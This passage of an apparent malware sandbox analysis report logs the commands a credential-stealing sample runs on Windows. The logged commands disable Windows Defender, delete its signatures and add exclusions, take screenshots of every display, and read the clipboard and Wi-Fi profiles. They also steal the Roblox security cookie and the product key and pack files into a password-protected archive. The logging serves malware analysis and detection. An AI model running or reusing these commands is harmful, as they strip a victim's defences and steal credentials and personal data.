              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Modifies Windows Defender protection settings
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Removes signatures from Windows Defender
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Users\user\Desktop\9g9LZNE4bH.exe "C:\Users\user\Desktop\9g9LZNE4bH.exe"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuA